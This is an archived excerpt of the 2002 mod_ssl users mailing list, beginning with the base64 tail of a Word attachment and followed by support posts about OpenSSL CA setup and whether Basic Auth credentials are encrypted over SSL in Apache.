AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAACAAAAAwAAAAQAAAAFAAAABgAAAAcAAAAIAAAA
/v///woAAAALAAAADAAAAA0AAAAOAAAADwAAABAAAAARAAAAEgAAABMAAAAUAAAAFQAAABYA
AAAXAAAAGAAAABkAAAAaAAAAGwAAABwAAAAdAAAAHgAAAB8AAAAgAAAAIQAAACIAAAAjAAAA
JAAAACUAAAAmAAAAJwAAACgAAAApAAAAKgAAACsAAAAsAAAALQAAAC4AAAAvAAAAMAAAADEA
AAAyAAAAMwAAADQAAAA1AAAANgAAADcAAAA4AAAAOQAAADoAAAA7AAAAPAAAAD0AAAA+AAAA
PwAAAEAAAABBAAAAQgAAAEMAAABEAAAARQAAAEYAAABHAAAASAAAAEkAAABKAAAASwAAAEwA
AABNAAAATgAAAE8AAABQAAAAUQAAAFIAAABTAAAAVAAAAFUAAABWAAAAVwAAAFgAAABZAAAA
WgAAAFsAAABcAAAAXQAAAF4AAABfAAAAYAAAAGEAAABiAAAAYwAAAGQAAABlAAAAZgAAAGcA
AABoAAAAaQAAAGoAAABrAAAAbAAAAG0AAABuAAAAbwAAAHAAAABxAAAAcgAAAHMAAAB0AAAA
dQAAAHYAAAB3AAAAeAAAAHkAAAB6AAAAewAAAHwAAAB9AAAAfgAAAH8AAACAAAAAgQAAAIIA
AACDAAAAhAAAAIUAAACGAAAAhwAAAIgAAACJAAAAigAAAIsAAACMAAAAjQAAAI4AAACPAAAA
kAAAAJEAAACSAAAAkwAAAJQAAACVAAAAlgAAAJcAAACYAAAAmQAAAJoAAACbAAAAnAAAAJ0A
AACeAAAAnwAAAKAAAAChAAAAogAAAKMAAACkAAAApQAAAKYAAACnAAAAqAAAAP7///+qAAAA
qwAAAKwAAACtAAAArgAAAK8AAACwAAAA/v///7IAAACzAAAAtAAAALUAAAC2AAAAtwAAALgA
AAD+////ugAAALsAAAC8AAAAvQAAAL4AAAC/AAAAwAAAAP7////9/////f///8QAAAD+////
/v////7/////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
//////////////////////////9SAG8AbwB0ACAARQBuAHQAcgB5AAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFgAFAf//////////AwAAAAYJAgAAAAAA
wAAAAAAAAEYAAAAAAAAAAAAAAADwHkh3/pbCAcYAAACAAAAAAAAAAEQAYQB0AGEAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKAAIB
////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACQAAAKI+
AQAAAAAAMQBUAGEAYgBsAGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA4AAgEBAAAABgAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAACpAAAAABAAAAAAAABXAG8AcgBkAEQAbwBjAHUAbQBlAG4AdAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGgACAQIAAAAFAAAA/////wAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAiEAAAAAAAAAUAUwB1AG0A
bQBhAHIAeQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAoAAIB////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
sQAAAAAQAAAAAAAABQBEAG8AYwB1AG0AZQBuAHQAUwB1AG0AbQBhAHIAeQBJAG4AZgBvAHIA
bQBhAHQAaQBvAG4AAAAAAAAAAAAAADgAAgEEAAAA//////////8AAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAC5AAAAABAAAAAAAAABAEMAbwBtAHAATwBiAGoAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgACAP//////////
/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAQAAAP7/////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////8BAP7/AwoAAP//
//8GCQIAAAAAAMAAAAAAAABGGgAAAE1pY3Jvc29mdCBXb3Jkb3YgZG9rdW1lbnQACgAAAE1T
V29yZERvYwAQAAAAV29yZC5Eb2N1bWVudC44APQ5snEAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA==
--------------010802080607010609080808--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 28 18:40:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA14438; Thu, 28 Nov 2002 18:39:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iris.dev.datalogica.com id SAA14429; Thu, 28 Nov 2002 18:38:15 +0100 (MET)
Received: from localhost (localhost [[UNIX: localhost]])
	by iris.dev.datalogica.com (8.11.6/8.11.6) id gASHcDr06655
	for modssl-users@modssl.org; Thu, 28 Nov 2002 17:38:13 GMT
Content-Type: text/plain;
  charset="iso-8859-1"
From: Maurizio Marini 
To: modssl-users@modssl.org
Subject: Re: Problems with creating own CA
Date: Thu, 28 Nov 2002 18:38:12 +0100
User-Agent: KMail/1.4.1
References: <3DE62BEC.2050005@stupar.homelinux.net> <200211281724.10858.maumar@datalogica.com> <3DE64A0E.5070705@stupar.homelinux.net>
In-Reply-To: <3DE64A0E.5070705@stupar.homelinux.net>
MIME-Version: 1.0
Message-Id: <200211281838.13348.maumar@datalogica.com>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA14435
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maurizio Marini 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Thursday 28 November 2002 05:53 pm, Sasa STUPAR wrote:
 >I have here made a printscr and save it in a word doc. Please look at
 >it, maybe it will give same clue.
 in fact!
it seems that you lack openssl.conf pathname in your env vars
check your env a search for something realted to this
byez!

- -- 
Maurizio Marini			GSM +39-335-8259739
Altamura: +39-080-3105228	Fax +39-080-3105228
Pesaro: 	+39-0721-54277 	Fax +39-0721-415055
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE95lSF4Q/49nIJTlwRAnh5AJ4n0nqzTCd1dBaOjpx7KewlUyNucACfbxQe
/Z2RE3roRyop6t0s4v4iXAI=
=/YNG
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 28 19:40:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA15908; Thu, 28 Nov 2002 19:39:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from albatross.prod.itd.earthlink.net id TAA15904; Thu, 28 Nov 2002 19:38:35 +0100 (MET)
Received: from h-69-3-138-186.snvacaid.covad.net ([69.3.138.186] helo=RON1QM4JVWEP50)
	by albatross.prod.itd.earthlink.net with smtp (Exim 3.33 #1)
	id 18HTYX-0000ED-00
	for modssl-users@modssl.org; Thu, 28 Nov 2002 10:38:33 -0800
From: "Ron McKeever" 
To: 
Subject: RE: What is a good way to determine this
Date: Thu, 28 Nov 2002 10:38:08 -0800
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <5.1.0.14.0.20021127170328.01a82570@localhost>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ron McKeever" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Mark,

I use SSLFakeBasicAuth in my httpd.conf. I assumed it was encrypted because
I'm stating to use SSL but fake basic Auth. Maybe I am not understanding
SSLFakeBasicAuth? Let me know what other people say, I would appericate
that.

Thanks
Ron

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Mark Barton
Sent: Wednesday, November 27, 2002 2:32 PM
To: modssl-users@modssl.org
Subject: What is a good way to determine this


I have what I think is probably an easy question to answer, but I have done
some searching and have not found anything obvious. The gist of the
question is:

I have mod_ssl running and have my entire site covered with it (there is
nothing listening on port 80). I also have .htaccess files forcing people
to log into the site. Is the username and password transaction from the
.htaccess prompt encrypted, being as it is the first thing the user logging
on is prompted to perform?

My gut feeling is, of course. I have SSL options protecting the directory
and the .htaccess file (i will include those at the end). But the reason
why I am doubting myself is the logs show me something sketchy. I have a
Custom log that shows the username and SSL environment variables of the
user logging in:

...
    LogFormat "%t \t%u \t-->
%{SSL_CIPHER}e  %{SSL_CIPHER_USEKEYSIZE}e  %{SSL_PROTOCOL}e <--
\t%r"  sslformat
    CustomLog logs/ssl/mbsindassl.log sslformat
...

But here is the log file entry that I am worried about:
...
[27/Nov/2002:16:46:29 -0500] 	- 	--> -  -  - <-- 	GET /index.html HTTP/1.1
[27/Nov/2002:16:46:34 -0500] 	mbarton 	--> RC4-MD5  128  SSLv3 <-- 	GET
/index.html HTTP/1.1
...

The log file shows first the request with no username (which makes sense
because they haven't logged on yet) but the SSL environment variables are
all NULL too. So is this just a problem with the way environment variables
are reported to the log? Because it looks like there is not an SSL
connection before the user logs in!

I have verifed that SSL is up and running and working correctly for the
site with s_client.

The software I am using is:
Windows 2000
Apache 1.3.27
Mod_SSL 2.8.12
OpenSSL 0.9.6g


Here is the top-level .htaccess file
------------------------------------------------------------
AuthName "Dude, you had better be authorized"
AuthType Basic
AuthUserFile "C:/MBserver/Apache/bin/.htpasswd"

SSLRequireSSL
SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128

require user mbarton


Here is the relevant SSL Portion of the httpd.conf file
----------------------------------------------------------------------------
-------



	AddType application/x-x509-ca-cert .crt
	AddType application/x-pkcs7-crl    .crl

	SSLMutex sem
	SSLSessionCache         dbm:logs/ssl/scache
	SSLSessionCacheTimeout  400
	SSLRandomSeed startup builtin
	SSLRandomSeed connect builtin
	SSLLog      logs/ssl/engine.log
    	SSLLogLevel warn

	

	DocumentRoot "C:/MBserver/Apache/secure"
	ErrorLog logs/ssl/error.log
	LogLevel debug
	TransferLog logs/ssl/access.log
	LogLevel debug
	AccessFileName .htaccess

	LogFormat "%>s \t%u \t%r \t%t \t%f \t%h \t%a \t%A \t%c \t%b \t%e \t%p
\t%s" docscommon
	LogFormat "%t \t%u \t%{Referer}i -> %U" docsreferer
	LogFormat "%t \t%u \t%{User-agent}i" docsagent
	LogFormat "%t \t%u \t%r" docssmall
    	LogFormat "%t \t%u \t-->
%{SSL_CIPHER}e  %{SSL_CIPHER_USEKEYSIZE}e  %{SSL_PROTOCOL}e <--
\t%r"  sslformat

    	CustomLog logs/ssl/mbsinda.log docscommon
	CustomLog logs/ssl/mbsindareferer.log docsreferer
	CustomLog logs/ssl/mbsindaagent.log docsagent
	CustomLog logs/ssl/mbsindasmall.log docssmall
    	CustomLog logs/ssl/mbsindassl.log sslformat

	ScriptAlias /cgi-bin/ "C:/MBserver/Apache/secure/cgi-bin/"

	
	   SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128
	   SSLOptions +StdEnvVars +ExportCertData
	

	SSLProtocol -all +SSLv3
	SSLCipherSuite ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+SSLv3:-EXP:-LOW:-SSLv2

	SSLCertificateFile "C:/MBserver/Apache/conf/ssl-AA/MBsindaSSL.crt"
	SSLCertificateKeyFile "C:/MBserver/Apache/conf/ssl-AA/MBsindaSSL.key"
    	SSLCACertificateFile "C:/MBserver/Apache/conf/ssl-AA/MBsindaCA.crt"
    	SSLCACertificatePath "C:/MBserver/Apache/conf/ssl-AA"
	SSLOptions +CompatEnvVars +StdEnvVars
	SSLEngine on

	



I appreciate you guys taking a look at this,

Thanks,
Mark Barton

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 29 10:07:37 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA11007; Fri, 29 Nov 2002 10:06:14 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id KAA10635; Fri, 29 Nov 2002 10:05:11 +0100 (MET)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id gAT947d31568
	for ; Fri, 29 Nov 2002 09:04:28 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 29 Nov 2002 09:03:53 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F23F1@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: What is a good way to determine this
Date: Fri, 29 Nov 2002 09:03:53 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Yes, it is encrypted. The process is as follows:

Browser connects and handshakes the SSL encryption level (with the obvious
key checks). The connection is then encrypted.
Browser sends GET request to server
Server sends authorisation request
Browser sends "Authorization:" header which IIRC is a base64 encoding of the
username and password (which is basically plain text, encrypted via SSL).
The page or data is returned if the connection is authorised.

So the logs are correct, as the GET request is sent without the
authorization header. What is confusing is that most browsers do not show a
padlock until after you send it (this isn't that difficult to fix, is it?). 

It could be argued that this method may be more "hackable" than putting a
login somewhere in the page (eg RedHat Network at https://rhn.redhat.com),
but I don't particularly want to go there.

We have a server internally that gives you the wrong pages if you proxy the
Authorization header, so I had someone produce a patch to prevent the
proxying of the Authorization header.

I realise I haven't answered the specific question as to why the log doesn't
show the SSL encryption level. Perhaps the server writes this entry before
the SSL handshaking completes? (I'd have to look in the source).

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

If we could learn one thing from September 11th 2001, it would be the utter
absurdity of moral relativism.

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 29 19:02:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA08442; Fri, 29 Nov 2002 19:01:28 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA08348; Fri, 29 Nov 2002 19:00:13 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 0FBFB4CE76D; Fri, 29 Nov 2002 19:00:10 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 9F3B328695; Fri, 29 Nov 2002 18:55:10 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from main.gmane.org id SAA06246; Fri, 29 Nov 2002 18:18:02 +0100 (MET)
Received: from list by main.gmane.org with local (Exim 3.35 #1 (Debian))
	id 18Hojz-0001qB-00
	for ; Fri, 29 Nov 2002 18:15:47 +0100
To: modssl-users@modssl.org
X-Injected-Via-Gmane: http://gmane.org/
Received: from news by main.gmane.org with local (Exim 3.35 #1 (Debian))
	id 18Hojy-0001q2-00
	for ; Fri, 29 Nov 2002 18:15:46 +0100
Path: not-for-mail
From: Paul Christmann 
Subject: mod_ssl and mod_jk (Win32)
Date: Fri, 29 Nov 2002 11:18:07 -0600
Lines: 35
Message-ID: <3DE7A14F.8030100@priorartisans.com>
NNTP-Posting-Host: route-216-227-98-91.telocity.com
